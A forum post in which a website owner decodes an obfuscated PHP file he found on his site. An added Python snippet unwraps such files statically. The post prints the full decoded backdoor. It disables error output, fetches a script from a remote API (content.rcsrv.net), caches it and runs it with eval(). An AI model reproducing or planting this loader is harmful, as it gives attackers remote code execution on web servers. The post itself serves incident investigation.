I don't really know a lot about PHP coding, more of a CSS/HTML guy, but spent some time on the content of the file that had been saved.
First off, the file isn't only encrypted by base64, it is also gz compressed. That explains why the online base64 decoders didn't work. Here's the first line of the file:
Code:
<?php define("GR_HOST_ID", "ftp_index_part9"); eval(gzinflate(base64_decode(
During my research of the gzinflate and base64 decode, I've stumbled upon this PHP decoder that did a pretty good job of deflating and decrypting the file AFAICS:
Code:
?><?php
ini_set("display_errors", 0);
error_reporting(0);
define("GR_CLIENT_VERSION", "remote_index_v1");
define("GR_SERVER_API_URL", "http://content.rcsrv.net/api.php");
define("GR_HOST_ID", "ftp_index_part2"); // profile ID
define("GR_USE_CACHE_SCRIPT", true);
define("GR_CACHE_SCRIPT_TIME", 60*60*12); // 12 hours, script caching
function GR_Run() { if (GR_USE_CACHE_SCRIPT) { $cache_id = md5(GR_GetHostId()."script");
$script = GR_GetCache($cache_id, GR_CACHE_SCRIPT_TIME, $cache_filename);
if ($script == false) { $script = GR_ServerRequest("get_script");
GR_SaveCache($cache_id, $script);
} } else { $script = GR_ServerRequest("get_script");
} if ($script) { eval($script); }} function GR_Init() { if(!function_exists('str_ireplace')){ function str_ireplace($search,$replace,$subject){ if (is_array($search)) { foreach ($search as $id => $r_search) { $r_replace = is_array($replace) ? $replace[$id] : $replace; $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($r_search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($r_search)); $haystack = substr_replace($haystack,$token,$pos,strlen($r_search)); } $subject = str_replace($token,$r_replace,$subject); } } else { $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($search)); $haystack = substr_replace($haystack,$token,$pos,strlen($search)); } $subject = str_replace($token,$replace,$subject); } return $subject; } } if (!function_exists("stripos")) { function stripos($str,$needle,$offset=0) { return strpos(strtolower($str),strtolower($needle),$offset); } }}function GR_GetHostId() { if (defined("GR_HOST_ID")) { $host_id = GR_HOST_ID; if (empty($host_id)) { $host_id = getenv("HTTP_HOST"); } } else { $host_id = getenv("HTTP_HOST"); } return $host_id;}function GR_ParseHeaders($s_headers) { $headers = array(); $hs = explode("\n", $s_headers); foreach ($hs as $h) { $h = trim($h); if (!empty($h)) { list($var, $value) = explode(": ", $h, 2); $headers[$var] = $value; } } return $headers;}function GR_ServerRequest($func_name, $vars = array()) { $url = GR_SERVER_API_URL."?ver=".GR_CLIENT_VERSION."&func=".urlencode($func_name)."&host_id=".urlencode(GR_GetHostId()); foreach ($vars as $var => $value) { $url .= "&".urlencode($var)."=".urlencode($value); } $a_full = file_get_contents($url); list($a_headers, $a_content) = explode("\r\n\r\n", $a_full, 2); $headers = GR_ParseHeaders($a_headers); if ($headers['status'] == "ok") { return $a_content; } else { return false; 
}}function GR_GetCachePath() { $path = false; if (function_exists('sys_get_temp_dir')) { $path = sys_get_temp_dir(); } else { if( $path = getenv('TMP') ) ; elseif( $path = getenv('TEMP') ) ; elseif( $path = getenv('TMPDIR') ) ; else { $path = tempnam(__FILE__,''); if (file_exists($path)) { unlink($path); $path = dirname($path); } } } return $path ? realpath($path) : false;}function GR_GetCache($filename, $time = 0, &$path) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; if (file_exists($path)) { if ($time == 0) { return file_get_contents($path); } elseif ($time > 0 and time()-filemtime($path) < $time) { /* cache is not expired */ return file_get_contents($path); } else { return false; } } else { return false; }}function GR_SaveCache($filename, $content) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; $fh = fopen($path, "w"); if ($fh) { fwrite($fh, $content); fclose($fh); return true; } else { return false; }} GR_Init();GR_Run();?><?
The above code is way beyond my knowledge of PHP. It does seem that the code above calls a server API at the defined link; the api.php file may have all of the referenced scripts. Whoever coded the above has some sense of humor. I did burst out laughing when I saw the variables of "$haystack,$needle".
As it is, I am not sure what the code above does; albeit, I am pretty sure that it isn't anything that should have been at my website.
Cr00zng
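The layering described in the post, eval(gzinflate(base64_decode(...))), can be peeled off statically so the suspect file is never executed. This is an added example, not part of the original post or the decoder it mentions; the function names, the size limits and the sample built by make_sample are assumptions made for illustration.

```python
import base64
import re
import zlib

# Matches eval(gzinflate(base64_decode("..."))) with either quote style.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"
)
DEFINE = re.compile(r"define\(\s*\"([A-Z_]+)\"\s*,\s*\"([^\"]*)\"\s*\)")
MAX_LAYERS = 20          # assumed limit: stop on pathological nesting
MAX_OUTPUT = 5_000_000   # assumed limit: decompression-bomb guard

def inflate_raw(blob: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE: no zlib or gzip header (wbits=-15)."""
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(blob, MAX_OUTPUT)
    if d.unconsumed_tail:
        raise ValueError("decompressed layer exceeds MAX_OUTPUT")
    return out

def unwrap(php_source: str):
    """Peel nested wrappers as text only; return (decoded_source, layers_removed)."""
    layers = 0
    while layers < MAX_LAYERS:
        m = WRAPPER.search(php_source)
        if m is None:
            break
        inner = inflate_raw(base64.b64decode(m.group(2)))
        # latin-1 maps every byte, so odd encodings in comments never raise.
        php_source = php_source[:m.start()] + inner.decode("latin-1") + php_source[m.end():]
        layers += 1
    return php_source, layers

def string_defines(php_source: str) -> dict:
    """Collect define("NAME", "value") constants (e.g. the API URL) as indicators."""
    return dict(DEFINE.findall(php_source))

def make_sample(payload: str, depth: int) -> str:
    """Constructed test input: wrap a harmless payload `depth` times."""
    for _ in range(depth):
        c = zlib.compressobj(wbits=-15)
        raw = c.compress(payload.encode()) + c.flush()
        payload = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw).decode()
    return "<?php " + payload
```

A plain base64 decoder stops after the first step and shows only compressed bytes, which is why the raw-DEFLATE inflate is the step that matters here.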